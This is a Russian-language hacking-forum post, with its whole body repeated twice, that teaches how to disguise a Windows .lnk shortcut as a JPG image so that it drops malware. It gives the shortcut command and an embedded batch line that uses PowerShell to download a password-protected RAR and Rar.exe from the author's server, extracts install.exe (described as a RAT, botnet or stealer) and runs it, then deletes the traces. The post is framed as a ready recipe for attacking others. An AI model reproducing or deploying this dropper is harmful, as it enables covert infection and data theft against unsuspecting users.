LineDev
Новичок
- Статус
- offline
- Регистрация
- 15.06.2022
- Сообщения
- 19
- Репутация
- 0
Всех приветствую друзья, это не в коем случае не реклама стороннего ресурса но с более детальной информацией вы можете ознакомится на хабре, ссылка: https://habr.com/ru/company/group-ib/blog/493906/
Инструкция: https://yadi.sk/d/CIDx4WZLh-pbVw
Скачать пак иконок: https://yadi.sk/d/QfgZTHpHhelGSA
В данной теме я покажу лишь как это использовать в своих целях.
Всё что нам нужно это winrar архиватор а точнее Rar.exe и наш вредоносный файл RMS или RAT или BOTNET или STEALER итд. итп. Далее, наш вредоносный файл с названием install.exe запаковываем в архив под паролем, пароль:123321, название архива на выходе install.rar, файлы Rar.exe и install.rar заливаем на свой сервер и даём обоим файлам права 777 на чтение, запись и исполнение.
С ознакомительной частью мы уже разобрались, приступим к сборке.
Маскировать будем под картинку потому создаём ярлык на раб столе и указываем в расположении код:
%COMSPEC% /c "copy /Y image.lnk %temp%\1&findstr /c:"@Echo" %temp%\1>%temp%\s.bat&start /MIN %TEMP%\s.bat&exit"
Далее задаём имя что в расположении: image
Пример:
Далее заходим в свойства lnk файла и убираем рабочую папку
Пример:
И по желанию ставим любую иконку но так как мы хотим замаскировать под картинку то выбираем иконку jpg.
Открываем image.lnk в любом редакторе текста Notepad++ в моём случае версия 7.8.6 (Открываем np++ и переносим на главное окно наш lnk файл) и добавляем на следующую строку наш код на загрузку и запуск бэкдорки с сервера:
@Echo OFF && IF EXIST "%temp%\lnkexp.txt" (exit) ELSE echo lnkexp»%temp%\lnkexp.txt && powershell -Command (new-object System.Net.WebClient).DownloadFile('http://site.ru/install.rar', '%temp%/install.rar') && powershell -Command (new-object System.Net.WebClient).DownloadFile('http://site.ru/Rar.exe', '%temp%/Rar.exe') && %temp%\Rar.exe x -t -o+ -p123321 %temp%\install.rar %temp%\ && %temp%\install.exe && del /f /q %temp%\install.rar && del /f /q %temp%\Rar.exe && exit
Вот и всё, наш lnk готов, а всё то что далее думаю интуитивно понятно.
Ссылка на видео :
Инструкция: https://yadi.sk/d/CIDx4WZLh-pbVw
Скачать пак иконок: https://yadi.sk/d/QfgZTHpHhelGSA
В данной теме я покажу лишь как это использовать в своих целях.
Всё что нам нужно это winrar архиватор а точнее Rar.exe и наш вредоносный файл RMS или RAT или BOTNET или STEALER итд. итп. Далее, наш вредоносный файл с названием install.exe запаковываем в архив под паролем, пароль:123321, название архива на выходе install.rar, файлы Rar.exe и install.rar заливаем на свой сервер и даём обоим файлам права 777 на чтение, запись и исполнение.
С ознакомительной частью мы уже разобрались, приступим к сборке.
Маскировать будем под картинку потому создаём ярлык на раб столе и указываем в расположении код:
%COMSPEC% /c "copy /Y image.lnk %temp%\1&findstr /c:"@Echo" %temp%\1>%temp%\s.bat&start /MIN %TEMP%\s.bat&exit"
Далее задаём имя что в расположении: image
Пример:
Далее заходим в свойства lnk файла и убираем рабочую папку
Пример:
И по желанию ставим любую иконку но так как мы хотим замаскировать под картинку то выбираем иконку jpg.
Открываем image.lnk в любом редакторе текста Notepad++ в моём случае версия 7.8.6 (Открываем np++ и переносим на главное окно наш lnk файл) и добавляем на следующую строку наш код на загрузку и запуск бэкдорки с сервера:
@Echo OFF && IF EXIST "%temp%\lnkexp.txt" (exit) ELSE echo lnkexp»%temp%\lnkexp.txt && powershell -Command (new-object System.Net.WebClient).DownloadFile('http://site.ru/install.rar', '%temp%/install.rar') && powershell -Command (new-object System.Net.WebClient).DownloadFile('http://site.ru/Rar.exe', '%temp%/Rar.exe') && %temp%\Rar.exe x -t -o+ -p123321 %temp%\install.rar %temp%\ && %temp%\install.exe && del /f /q %temp%\install.rar && del /f /q %temp%\Rar.exe && exit
Вот и всё, наш lnk готов, а всё то что далее думаю интуитивно понятно.
Ссылка на видео :